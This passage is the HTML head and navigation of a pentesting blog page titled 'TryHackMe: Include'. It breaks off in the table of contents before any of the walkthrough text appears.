
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
        <meta name="description" content="A blog about pentesting, security, and technology.">
      
      
      
        <link rel="canonical" href="https://tomfieber.github.io/blog/2024/06/07/tryhackme-include.html">
      
      
        <link rel="prev" href="tryhackme-kenobi.html">
      
      
        <link rel="next" href="../22/vulnlab-breach.html">
      
      
      <link rel="icon" href="../../../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.6.16">
    
    
      
        <title>TryHackMe: Include - My Personal Site</title>
      
    
    
      <link rel="stylesheet" href="../../../../assets/stylesheets/main.7e37652d.min.css">
      
        
        <link rel="stylesheet" href="../../../../assets/stylesheets/palette.06af60db.min.css">
      
      


    
    
      
        <script src="https://unpkg.com/iframe-worker/shim"></script>
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
      <link rel="stylesheet" href="../../../../stylesheets/extra.css">
    
    <script>__md_scope=new URL("../../../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      
  


  
  

<script id="__analytics">function __md_analytics(){function e(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],e("js",new Date),e("config","G-HH4Y2D319L"),document.addEventListener("DOMContentLoaded",(function(){document.forms.search&&document.forms.search.query.addEventListener("blur",(function(){this.value&&e("event","search",{search_term:this.value})}));document$.subscribe((function(){var t=document.forms.feedback;if(void 0!==t)for(var a of t.querySelectorAll("[type=submit]"))a.addEventListener("click",(function(a){a.preventDefault();var n=document.location.pathname,d=this.getAttribute("data-md-value");e("event","feedback",{page:n,data:d}),t.firstElementChild.disabled=!0;var r=t.querySelector(".md-feedback__note [data-md-value='"+d+"']");r&&(r.hidden=!1)})),t.hidden=!1})),location$.subscribe((function(t){e("config","G-HH4Y2D319L",{page_path:t.pathname})}))}));var t=document.createElement("script");t.async=!0,t.src="https://www.googletagmanager.com/gtag/js?id=G-HH4Y2D319L",document.getElementById("__analytics").insertAdjacentElement("afterEnd",t)}</script>
  
    <script>"undefined"!=typeof __md_analytics&&__md_analytics()</script>
  

    
    
      
        <meta  property="og:type"  content="website" >
      
        <meta  property="og:title"  content="TryHackMe: Include - My Personal Site" >
      
        <meta  property="og:description"  content="A blog about pentesting, security, and technology." >
      
        <meta  property="og:image"  content="https://tomfieber.github.io/assets/images/social/blog/posts/tryhackme-include.png" >
      
        <meta  property="og:image:type"  content="image/png" >
      
        <meta  property="og:image:width"  content="1200" >
      
        <meta  property="og:image:height"  content="630" >
      
        <meta  property="og:url"  content="https://tomfieber.github.io/blog/2024/06/07/tryhackme-include.html" >
      
        <meta  name="twitter:card"  content="summary_large_image" >
      
        <meta  name="twitter:title"  content="TryHackMe: Include - My Personal Site" >
      
        <meta  name="twitter:description"  content="A blog about pentesting, security, and technology." >
      
        <meta  name="twitter:image"  content="https://tomfieber.github.io/assets/images/social/blog/posts/tryhackme-include.png" >
      
    
    
   <link href="../../../../assets/stylesheets/glightbox.min.css" rel="stylesheet"/><style>
    html.glightbox-open { overflow: initial; height: 100%; }
    .gslide-title { margin-top: 0px; user-select: text; }
    .gslide-desc { color: #666; user-select: text; }
    .gslide-image img { background: white; }
    .gscrollbar-fixer { padding-right: 15px; }
    .gdesc-inner { font-size: 0.75rem; }
    body[data-md-color-scheme="slate"] .gdesc-inner { background: var(--md-default-bg-color);}
    body[data-md-color-scheme="slate"] .gslide-title { color: var(--md-default-fg-color);}
    body[data-md-color-scheme="slate"] .gslide-desc { color: var(--md-default-fg-color);}</style> <script src="../../../../assets/javascripts/glightbox.min.js"></script></head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="default" data-md-color-primary="blue-grey" data-md-color-accent="indigo">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#tryhackme-include" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

  

<header class="md-header md-header--shadow md-header--lifted" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../../../../index.html" title="My Personal Site" class="md-header__button md-logo" aria-label="My Personal Site" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            My Personal Site
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              TryHackMe: Include
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="(prefers-color-scheme)" data-md-color-scheme="default" data-md-color-primary="blue-grey" data-md-color-accent="indigo"  aria-label="Switch to light mode"  type="radio" name="__palette" id="__palette_0">
    
      <label class="md-header__button md-icon" title="Switch to light mode" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m14.3 16-.7-2h-3.2l-.7 2H7.8L11 7h2l3.2 9zM20 8.69V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12zm-9.15 3.96h2.3L12 9z"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="blue-grey" data-md-color-accent="indigo"  aria-label="Switch to dark mode"  type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_2" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="blue-grey" data-md-color-accent="indigo"  aria-label="Switch to system preference"  type="radio" name="__palette" id="__palette_2">
    
      <label class="md-header__button md-icon" title="Switch to system preference" for="__palette_0" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
      </label>
    
  
</form>
      
    
    
      <script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
    
    
    
      
      
        <label class="md-header__button md-icon" for="__search">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        </label>
        <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
      
    
    
      <div class="md-header__source">
        <a href="https://github.com/tomfieber/tomfieber.github.io" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 7.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path fill="currentColor" d="M439.6 236.1 244 40.5c-5.4-5.5-12.8-8.5-20.4-8.5s-15 3-20.4 8.4L162.5 81l51.5 51.5c27.1-9.1 52.7 16.8 43.4 43.7l49.7 49.7c34.2-11.8 61.2 31 35.5 56.7-26.5 26.5-70.2-2.9-56-37.3L240.3 199v121.9c25.3 12.5 22.3 41.8 9.1 55-6.4 6.4-15.2 10.1-24.3 10.1s-17.8-3.6-24.3-10.1c-17.6-17.6-11.1-46.9 11.2-56v-123c-20.8-8.5-24.6-30.7-18.6-45L142.6 101 8.5 235.1C3 240.6 0 247.9 0 255.5s3 15 8.5 20.4l195.6 195.7c5.4 5.4 12.7 8.4 20.4 8.4s15-3 20.4-8.4l194.7-194.7c5.4-5.4 8.4-12.8 8.4-20.4s-3-15-8.4-20.4"/></svg>
  </div>
  <div class="md-source__repository">
    tomfieber/tomfieber.github.io
  </div>
</a>
      </div>
    
  </nav>
  
    
      
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../../../index.html" class="md-tabs__link">
        
  
  
    
  
  Home

      </a>
    </li>
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../../about-me/index.html" class="md-tabs__link">
          
  
  
    
  
  About me

        </a>
      </li>
    
  

      
        
  
  
  
    
  
  
    
    
      <li class="md-tabs__item md-tabs__item--active">
        <a href="../../../index.html" class="md-tabs__link">
          
  
  
    
  
  Blog

        </a>
      </li>
    
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../../references/index.html" class="md-tabs__link">
          
  
  
    
  
  References

        </a>
      </li>
    
  

      
    </ul>
  </div>
</nav>
    
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
                
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" hidden>
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


<nav class="md-nav md-nav--primary md-nav--lifted" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../../../../index.html" title="My Personal Site" class="md-nav__button md-logo" aria-label="My Personal Site" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    My Personal Site
  </label>
  
    <div class="md-nav__source">
      <a href="https://github.com/tomfieber/tomfieber.github.io" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 7.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path fill="currentColor" d="M439.6 236.1 244 40.5c-5.4-5.5-12.8-8.5-20.4-8.5s-15 3-20.4 8.4L162.5 81l51.5 51.5c27.1-9.1 52.7 16.8 43.4 43.7l49.7 49.7c34.2-11.8 61.2 31 35.5 56.7-26.5 26.5-70.2-2.9-56-37.3L240.3 199v121.9c25.3 12.5 22.3 41.8 9.1 55-6.4 6.4-15.2 10.1-24.3 10.1s-17.8-3.6-24.3-10.1c-17.6-17.6-11.1-46.9 11.2-56v-123c-20.8-8.5-24.6-30.7-18.6-45L142.6 101 8.5 235.1C3 240.6 0 247.9 0 255.5s3 15 8.5 20.4l195.6 195.7c5.4 5.4 12.7 8.4 20.4 8.4s15-3 20.4-8.4l194.7-194.7c5.4-5.4 8.4-12.8 8.4-20.4s-3-15-8.4-20.4"/></svg>
  </div>
  <div class="md-source__repository">
    tomfieber/tomfieber.github.io
  </div>
</a>
    </div>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../../index.html" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Home
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    
    
      
        
          
        
      
        
      
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" >
        
          
          <div class="md-nav__link md-nav__container">
            <a href="../../../../about-me/index.html" class="md-nav__link ">
              
  
  
  <span class="md-ellipsis">
    About me
    
  </span>
  

            </a>
            
              
              <label class="md-nav__link " for="__nav_2" id="__nav_2_label" tabindex="0">
                <span class="md-nav__icon md-icon"></span>
              </label>
            
          </div>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            About me
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../../about-me/resume.html" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Resume
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
    
  
  
  
    
    
      
        
          
        
      
        
      
        
      
    
    
    
      
        
        
      
      
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--section md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" checked>
        
          
          <div class="md-nav__link md-nav__container">
            <a href="../../../index.html" class="md-nav__link ">
              
  
  
  <span class="md-ellipsis">
    Blog
    
  </span>
  

            </a>
            
              
              <label class="md-nav__link " for="__nav_3" id="__nav_3_label" tabindex="">
                <span class="md-nav__icon md-icon"></span>
              </label>
            
          </div>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_3">
            <span class="md-nav__icon md-icon"></span>
            Blog
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
            
              
                
  
  
  
  
    
    
      
        
      
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3_2" >
        
          
          <label class="md-nav__link" for="__nav_3_2" id="__nav_3_2_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Archive
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_3_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_3_2">
            <span class="md-nav__icon md-icon"></span>
            Archive
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    
  
  
    <li class="md-nav__item">
      <a href="../../../archive/2024.html" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    2024
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    
    
      
        
      
        
      
        
      
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3_3" >
        
          
          <label class="md-nav__link" for="__nav_3_3" id="__nav_3_3_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Categories
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_3_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_3_3">
            <span class="md-nav__icon md-icon"></span>
            Categories
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    
  
  
    <li class="md-nav__item">
      <a href="../../../category/tryhackme.html" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    tryhackme
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    
  
  
    <li class="md-nav__item">
      <a href="../../../category/vulnlab.html" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    vulnlab
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    
  
  
    <li class="md-nav__item">
      <a href="../../../category/writeups.html" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    writeups
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
      
        
          
        
      
        
      
        
      
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
        
          
          <div class="md-nav__link md-nav__container">
            <a href="../../../../references/index.html" class="md-nav__link ">
              
  
  
  <span class="md-ellipsis">
    References
    
  </span>
  

            </a>
            
              
              <label class="md-nav__link " for="__nav_4" id="__nav_4_label" tabindex="0">
                <span class="md-nav__icon md-icon"></span>
              </label>
            
          </div>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4">
            <span class="md-nav__icon md-icon"></span>
            References
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
            
              
                
  
  
  
  
    
    
      
        
      
        
      
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_2" >
        
          
          <label class="md-nav__link" for="__nav_4_2" id="__nav_4_2_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Cheatsheets
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4_2">
            <span class="md-nav__icon md-icon"></span>
            Cheatsheets
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    
    
      
        
          
        
      
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_2_1" >
        
          
          <div class="md-nav__link md-nav__container">
            <a href="../../../../references/cheatsheets/CORS/index.html" class="md-nav__link ">
              
  
  
  <span class="md-ellipsis">
    CORS
    
  </span>
  

            </a>
            
          </div>
        
        <nav class="md-nav" data-md-level="3" aria-labelledby="__nav_4_2_1_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4_2_1">
            <span class="md-nav__icon md-icon"></span>
            CORS
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    
    
      
        
      
        
      
        
      
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_2_2" >
        
          
          <label class="md-nav__link" for="__nav_4_2_2" id="__nav_4_2_2_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Injection attacks
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="3" aria-labelledby="__nav_4_2_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4_2_2">
            <span class="md-nav__icon md-icon"></span>
            Injection attacks
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    
    
      
        
          
        
      
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_2_2_1" >
        
          
          <div class="md-nav__link md-nav__container">
            <a href="../../../../references/cheatsheets/injection-attacks/NoSQL/index.html" class="md-nav__link ">
              
  
  
  <span class="md-ellipsis">
    NoSQL
    
  </span>
  

            </a>
            
          </div>
        
        <nav class="md-nav" data-md-level="4" aria-labelledby="__nav_4_2_2_1_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4_2_2_1">
            <span class="md-nav__icon md-icon"></span>
            NoSQL
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    
    
      
        
          
        
      
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_2_2_2" >
        
          
          <div class="md-nav__link md-nav__container">
            <a href="../../../../references/cheatsheets/injection-attacks/OS-command-injection/index.html" class="md-nav__link ">
              
  
  
  <span class="md-ellipsis">
    OS command injection
    
  </span>
  

            </a>
            
          </div>
        
        <nav class="md-nav" data-md-level="4" aria-labelledby="__nav_4_2_2_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4_2_2_2">
            <span class="md-nav__icon md-icon"></span>
            OS command injection
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    
    
      
        
          
        
      
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_2_2_3" >
        
          
          <div class="md-nav__link md-nav__container">
            <a href="../../../../references/cheatsheets/injection-attacks/SQL-injection/index.html" class="md-nav__link ">
              
  
  
  <span class="md-ellipsis">
    SQL injection
    
  </span>
  

            </a>
            
          </div>
        
        <nav class="md-nav" data-md-level="4" aria-labelledby="__nav_4_2_2_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4_2_2_3">
            <span class="md-nav__icon md-icon"></span>
            SQL injection
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
            
          </ul>
        </nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    
    
      
        
      
        
      
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_3" >
        
          
          <label class="md-nav__link" for="__nav_4_3" id="__nav_4_3_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Methodologies
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4_3">
            <span class="md-nav__icon md-icon"></span>
            Methodologies
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    
    
      
        
      
        
      
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_3_1" >
        
          
          <label class="md-nav__link" for="__nav_4_3_1" id="__nav_4_3_1_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Infrastructure
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="3" aria-labelledby="__nav_4_3_1_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4_3_1">
            <span class="md-nav__icon md-icon"></span>
            Infrastructure
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../../references/methodologies/infrastructure/external-network-pentesting.html" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    External Network Testing
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../../references/methodologies/infrastructure/internal-network-pentesting.html" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Internal Network Pentesting
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    
    
      
        
      
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_3_2" >
        
          
          <label class="md-nav__link" for="__nav_4_3_2" id="__nav_4_3_2_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Web apps
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="3" aria-labelledby="__nav_4_3_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4_3_2">
            <span class="md-nav__icon md-icon"></span>
            Web apps
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../../references/methodologies/web-apps/owasp-wstg.html" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    OWASP WSTG
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
                
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#walkthrough" class="md-nav__link">
    <span class="md-ellipsis">
      Walkthrough
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Walkthrough">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#enumeration" class="md-nav__link">
    <span class="md-ellipsis">
      Enumeration
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Enumeration">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#port-scanning" class="md-nav__link">
    <span class="md-ellipsis">
      Port Scanning
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#service-enumeration" class="md-nav__link">
